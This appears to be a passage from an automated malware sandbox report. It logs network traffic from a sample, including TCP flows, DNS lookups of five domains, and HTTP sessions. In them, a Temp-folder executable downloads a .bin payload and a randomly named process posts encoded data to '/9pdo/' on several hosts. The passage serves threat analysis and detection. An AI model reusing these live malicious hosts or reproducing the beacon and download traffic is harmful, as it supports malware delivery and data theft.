Apr 16, 2024 17:17:31.818002939 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:31.876513958 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.876545906 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.876562119 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.876579046 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.876595974 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.876610994 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.876624107 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:31.876624107 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:31.876629114 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.876646042 CEST | 80 | 49743 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:31.876665115 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:31.876684904 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:31.876684904 CEST | 49743 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:32.835820913 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.110939980 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.111026049 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.112703085 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.385976076 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.418813944 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.512094021 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.512126923 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.512173891 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.512182951 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.512192011 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.512209892 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.512228012 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.512245893 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.512262106 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.512279034 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.512295961 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.512415886 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.512415886 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.512415886 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.512415886 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.787166119 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787199020 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787218094 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787235975 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787252903 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.787278891 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.787292957 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787312031 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787328959 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787347078 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787360907 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.787364960 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787384033 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787390947 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.787401915 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787420034 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787431955 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.787437916 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787455082 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787457943 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.787473917 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787492037 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787503958 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.787508965 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787527084 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787530899 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.787552118 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787570000 CEST | 80 | 49744 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:33.787580967 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:33.787621975 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:34.614856958 CEST | 49744 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:35.632915020 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:35.910182953 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:35.910378933 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:35.913053989 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:36.187304020 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.189481020 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.189516068 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.189551115 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.189584017 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.220225096 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.808468103 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.808505058 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.808522940 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.808542967 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.808563948 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.808581114 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.808603048 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.808620930 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.808639050 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.808649063 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:36.808649063 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:36.808659077 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:36.808675051 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:36.808888912 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:37.085151911 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085277081 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085315943 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085342884 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:37.085355043 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085391998 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085402966 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:37.085428953 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085465908 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085473061 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:37.085504055 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085541010 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085546970 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:37.085577011 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085616112 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085623026 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:37.085653067 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085690975 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085695982 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:37.085727930 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085766077 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085776091 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:37.085804939 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085844040 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085850000 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:37.085884094 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.085926056 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:37.362571955 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.362646103 CEST | 80 | 49745 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:37.362812996 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:37.427170992 CEST | 49745 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:38.445324898 CEST | 49746 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:38.719130993 CEST | 80 | 49746 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:38.719352007 CEST | 49746 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:38.720685005 CEST | 49746 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:38.992697954 CEST | 80 | 49746 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:39.027257919 CEST | 80 | 49746 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:39.075516939 CEST | 80 | 49746 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:39.075552940 CEST | 80 | 49746 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:39.075759888 CEST | 49746 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:39.078169107 CEST | 49746 | 80 | 192.168.2.4 | 219.94.128.41
Apr 16, 2024 17:17:39.351284981 CEST | 80 | 49746 | 219.94.128.41 | 192.168.2.4
Apr 16, 2024 17:17:44.526437044 CEST | 49747 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:44.738598108 CEST | 80 | 49747 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:44.738687038 CEST | 49747 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:44.740124941 CEST | 49747 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:44.951935053 CEST | 80 | 49747 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:44.952512980 CEST | 80 | 49747 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:44.952528000 CEST | 80 | 49747 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:44.952687025 CEST | 49747 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:46.255310059 CEST | 49747 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:47.273850918 CEST | 49748 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:47.487150908 CEST | 80 | 49748 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:47.487390995 CEST | 49748 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:47.488965034 CEST | 49748 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:47.701905966 CEST | 80 | 49748 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:47.702028036 CEST | 80 | 49748 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:47.702538013 CEST | 80 | 49748 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:47.702610016 CEST | 49748 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:49.005400896 CEST | 49748 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:50.023248911 CEST | 49749 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:50.237149954 CEST | 80 | 49749 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:50.238363028 CEST | 49749 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:50.239228964 CEST | 49749 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:50.452877045 CEST | 80 | 49749 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:50.452938080 CEST | 80 | 49749 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:50.452971935 CEST | 80 | 49749 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:50.453003883 CEST | 80 | 49749 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:50.453036070 CEST | 80 | 49749 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:50.453068018 CEST | 80 | 49749 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:50.453104973 CEST | 80 | 49749 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:50.453140020 CEST | 80 | 49749 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:50.453331947 CEST | 80 | 49749 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:50.453386068 CEST | 49749 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:51.755377054 CEST | 49749 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:52.773525000 CEST | 49750 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:52.986831903 CEST | 80 | 49750 | 81.88.63.46 | 192.168.2.4
Apr 16, 2024 17:17:52.987032890 CEST | 49750 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:52.988706112 CEST | 49750 | 80 | 192.168.2.4 | 81.88.63.46
Apr 16, 2024 17:17:53.201710939 CEST | 80 | 49750 | 81.88.63.46 | 192.168.2.4
                                                                      Apr 16, 2024 17:17:53.201888084 CEST804975081.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:53.202085018 CEST804975081.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:53.202261925 CEST4975080192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:53.204134941 CEST4975080192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:53.417567015 CEST804975081.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:58.517977953 CEST4975180192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:17:58.699419022 CEST804975166.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:17:58.699563980 CEST4975180192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:17:58.706362963 CEST4975180192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:17:58.890928984 CEST804975166.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:17:58.903675079 CEST804975166.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:17:58.903695107 CEST804975166.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:17:58.906775951 CEST4975180192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:00.213960886 CEST4975180192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:01.585314035 CEST4975280192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:01.770210028 CEST804975266.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:18:01.770303011 CEST4975280192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:01.771581888 CEST4975280192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:01.949722052 CEST804975266.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:18:01.963171005 CEST804975266.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:18:01.963191032 CEST804975266.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:18:01.963234901 CEST4975280192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:03.286710024 CEST4975280192.168.2.466.29.135.159
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 16, 2024 17:16:59.170424938 CEST | 58330 | 53 | 192.168.2.4 | 1.1.1.1
Apr 16, 2024 17:16:59.912180901 CEST | 53 | 58330 | 1.1.1.1 | 192.168.2.4
Apr 16, 2024 17:17:15.540199995 CEST | 49198 | 53 | 192.168.2.4 | 1.1.1.1
Apr 16, 2024 17:17:15.768779993 CEST | 53 | 49198 | 1.1.1.1 | 192.168.2.4
Apr 16, 2024 17:17:29.415472984 CEST | 53334 | 53 | 192.168.2.4 | 1.1.1.1
Apr 16, 2024 17:17:30.015701056 CEST | 53 | 53334 | 1.1.1.1 | 192.168.2.4
Apr 16, 2024 17:17:44.086180925 CEST | 49255 | 53 | 192.168.2.4 | 1.1.1.1
Apr 16, 2024 17:17:44.524148941 CEST | 53 | 49255 | 1.1.1.1 | 192.168.2.4
Apr 16, 2024 17:17:58.214392900 CEST | 58602 | 53 | 192.168.2.4 | 1.1.1.1
Apr 16, 2024 17:17:58.514955044 CEST | 53 | 58602 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 16, 2024 17:16:59.170424938 CEST | 192.168.2.4 | 1.1.1.1 | 0x3fac | Standard query (0) | www.ejbodyart.com | A (IP address) | IN (0x0001) | false
Apr 16, 2024 17:17:15.540199995 CEST | 192.168.2.4 | 1.1.1.1 | 0x844a | Standard query (0) | www.jt-berger.store | A (IP address) | IN (0x0001) | false
Apr 16, 2024 17:17:29.415472984 CEST | 192.168.2.4 | 1.1.1.1 | 0xbd7f | Standard query (0) | www.n-benriya002.com | A (IP address) | IN (0x0001) | false
Apr 16, 2024 17:17:44.086180925 CEST | 192.168.2.4 | 1.1.1.1 | 0x15f9 | Standard query (0) | www.scwspark.com | A (IP address) | IN (0x0001) | false
Apr 16, 2024 17:17:58.214392900 CEST | 192.168.2.4 | 1.1.1.1 | 0x1c7d | Standard query (0) | www.eternalsunrise.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 16, 2024 17:16:59.912180901 CEST | 1.1.1.1 | 192.168.2.4 | 0x3fac | No error (0) | www.ejbodyart.com | ejbodyart.com | - | CNAME (Canonical name) | IN (0x0001) | false
Apr 16, 2024 17:16:59.912180901 CEST | 1.1.1.1 | 192.168.2.4 | 0x3fac | No error (0) | ejbodyart.com | - | 112.175.50.218 | A (IP address) | IN (0x0001) | false
Apr 16, 2024 17:17:15.768779993 CEST | 1.1.1.1 | 192.168.2.4 | 0x844a | No error (0) | www.jt-berger.store | - | 217.160.0.183 | A (IP address) | IN (0x0001) | false
Apr 16, 2024 17:17:30.015701056 CEST | 1.1.1.1 | 192.168.2.4 | 0xbd7f | No error (0) | www.n-benriya002.com | n-benriya002.com | - | CNAME (Canonical name) | IN (0x0001) | false
Apr 16, 2024 17:17:30.015701056 CEST | 1.1.1.1 | 192.168.2.4 | 0xbd7f | No error (0) | n-benriya002.com | - | 219.94.128.41 | A (IP address) | IN (0x0001) | false
Apr 16, 2024 17:17:44.524148941 CEST | 1.1.1.1 | 192.168.2.4 | 0x15f9 | No error (0) | www.scwspark.com | - | 81.88.63.46 | A (IP address) | IN (0x0001) | false
Apr 16, 2024 17:17:58.514955044 CEST | 1.1.1.1 | 192.168.2.4 | 0x1c7d | No error (0) | www.eternalsunrise.xyz | - | 66.29.135.159 | A (IP address) | IN (0x0001) | false
• 103.14.155.180
• www.ejbodyart.com
• www.jt-berger.store
• www.n-benriya002.com
• www.scwspark.com
• www.eternalsunrise.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 103.14.155.180 | 80 | 7908 | C:\Users\user\AppData\Local\Temp\Untapestried.exe

Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 17:16:35.011692047 CEST | 176 | OUT | GET /CkkRLCTUxW193.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 103.14.155.180
Cache-Control: no-cache
Apr 16, 2024 17:16:35.416344881 CEST | 1289 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 16 Apr 2024 13:40:35 GMT
Accept-Ranges: bytes
ETag: "9fb619a9390da1:0"
Server: Microsoft-IIS/8.5
Date: Tue, 16 Apr 2024 15:16:35 GMT
Content-Length: 270400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 112.175.50.218 | 80 | 1908 | C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe

Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 17:17:00.197278976 CEST | 473 | OUT | GET /9pdo/?jzuh=7Bfls2&edR0hF=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
Host: www.ejbodyart.com
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Apr 16, 2024 17:17:00.489064932 CEST | 398 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 16 Apr 2024 15:17:00 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
Apr 16, 2024 17:17:00.489125967 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 217.160.0.183 | 80 | 1908 | C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe

Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 17:17:15.983711004 CEST | 749 | OUT | POST /9pdo/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Connection: close
Cache-Control: no-cache
Host: www.jt-berger.store
Origin: http://www.jt-berger.store
Referer: http://www.jt-berger.store/9pdo/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Data Ascii: edR0hF=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0qt4MPF/0psNt0pyZT8IApwVxTjvxQpj1Q==
Apr 16, 2024 17:17:16.198116064 CEST | 558 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Tue, 16 Apr 2024 15:17:16 GMT
Server: Apache
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 217.160.0.183 | 80 | 1908 | C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe

Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 17:17:18.719245911 CEST | 769 | OUT | POST /9pdo/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Connection: close
Cache-Control: no-cache
Host: www.jt-berger.store
Origin: http://www.jt-berger.store
Referer: http://www.jt-berger.store/9pdo/
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Data Ascii: edR0hF=w9/X/ZL56raZ5Bl37jl22pEo7kSNSytNWUZrRaFTAPbCglr/KlAho7XI8pyhsWSdcXpG7HdvjfVkTxzhMWGl+rKkJtp+/Zu1kl64fwz9tSUqzI+SAFvThGxgI4oaI8NZ8VWC4z7W7sDXtYnWhlfHbslu10FDvhvr+JcyC/Bn77gJlS4oIidfSpUmsUqb8TUquaP2UmU6pEPr+5JwS6zfU90=
Apr 16, 2024 17:17:18.935375929 CEST | 558 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Tue, 16 Apr 2024 15:17:18 GMT
Server: Apache
Content-Encoding: gzip
